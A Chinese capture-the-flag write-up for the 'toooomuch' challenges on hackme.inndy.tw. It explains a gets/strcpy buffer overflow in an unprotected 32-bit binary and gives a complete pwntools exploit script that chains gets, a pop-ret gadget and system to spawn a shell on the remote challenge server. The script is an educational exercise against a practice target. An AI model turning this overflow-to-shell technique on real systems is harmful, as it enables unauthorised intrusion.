https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了toooomuch这个题目感觉还不错,我把wp分享出来,方便大家学习
toooomuch的题目要求是:
nc hackme.inndy.tw 7702
Can you pass the game?
这个题目是一个二分猜测题目,很简单,passcode是硬编码在binary里面的
toooomuch-2的题目要求是:
nc hackme.inndy.tw 7702
Get a shell, please.
Tips: Buffer overflow, 0x8048560, shellcode
toooomuch的main函数:
toooomuch函数:
可以看到输入的数据没有任何限制的从gets进入到strcpy中,这里就造成了缓冲区溢出漏洞
再看看程序开启了哪些保护:
可以看到程序没有开任何保护
这个题目可以通过溢出调用gets函数,把/bin/sh写入bss段,然后再利用pop_ret把gets的参数弹出,然后再调用system函数,把bss段的中的/bin/sh传入就可以了
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'niexinming'
from pwn import *
context(terminal = ['gnome-terminal', '-x', 'sh', '-c'], arch = 'i386', os = 'linux', log_level = 'debug')
def debug(addr = '0x080487D7'):
raw_input('debug:')
gdb.attach(io, "b *" + addr)
shellcode="/bin/sh\0"
elf = ELF('/home/h11p/hackme/toooomuch2')
exec_system=elf.plt['system']
print "%x" % exec_system
gets_addr = elf.symbols['gets']
print "%x" % gets_addr
bss_addr = elf.bss()
print "%x" % bss_addr
offset = 28
#io = process('/home/h11p/hackme/toooomuch2')
io = remote('hackme.inndy.tw', 7702)
pop_ret=0x0804889b #pop_ret
system_addr= 0x08048649
payload = 'A' * offset
payload += p32(gets_addr)
payload +=p32(pop_ret)
payload += p32(bss_addr)
payload += p32(system_addr)
payload += p32(bss_addr)
payload += p32(0)
#debug()
io.sendline(payload)
io.sendline(shellcode)
io.interactive()
io.close()
效果: